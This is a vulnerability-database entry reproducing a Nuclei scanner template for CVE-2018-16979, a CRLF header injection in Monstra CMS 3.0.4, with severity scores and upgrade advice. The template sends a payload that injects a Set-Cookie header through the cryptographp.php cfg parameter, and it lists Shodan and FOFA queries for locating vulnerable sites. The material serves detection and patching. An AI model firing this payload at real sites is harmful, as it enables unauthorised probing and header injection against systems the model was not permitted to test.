Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-16979
HistoryJan 08, 2023 - 5:00 p.m.

Monstra CMS 3.0.4 - HTTP Header Injection

2023-01-0817:00:33
ProjectDiscovery
github.com
8
cve-2018-16979
vulnerability
http-header
captcha
cryptographp
session-hijacking
xss
remote-code-execution
upgrade
redirects
cache-poisoning
virtual-hosts

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.4 Medium

AI Score

Confidence

High

0.003 Low

EPSS

Percentile

67.8%

Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943.
id: CVE-2018-16979

info:
  name: Monstra CMS 3.0.4 - HTTP Header Injection
  author: 0x_Akoko
  severity: medium
  description: |
    Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943.
  impact: |
    This vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and remote code execution (RCE).
  remediation: |
    Upgrade Monstra CMS to version 3.0.5 or later to mitigate the HTTP Header Injection vulnerability.
  reference:
    - https://github.com/howchen/howchen/issues/4
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16979
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-16979
    cwe-id: CWE-113
    epss-score: 0.00141
    epss-percentile: 0.48943
    cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: monstra
    product: monstra
    shodan-query: http.favicon.hash:419828698
    fofa-query: icon_hash=419828698
  tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'new line detected in'
          - 'cryptographp.php'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205f0f643f0280b3aefe1f1955b44b15712d5ccbcbdf55470bf60ae139ad08b3870221008a61c94baf588d5590ba60988681f69ac91aa02ad71a098ac1c191a627a45c0e:922c64590222798bb761d5b6d8e72950

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.4 Medium

AI Score

Confidence

High

0.003 Low

EPSS

Percentile

67.8%

Related for NUCLEI:CVE-2018-16979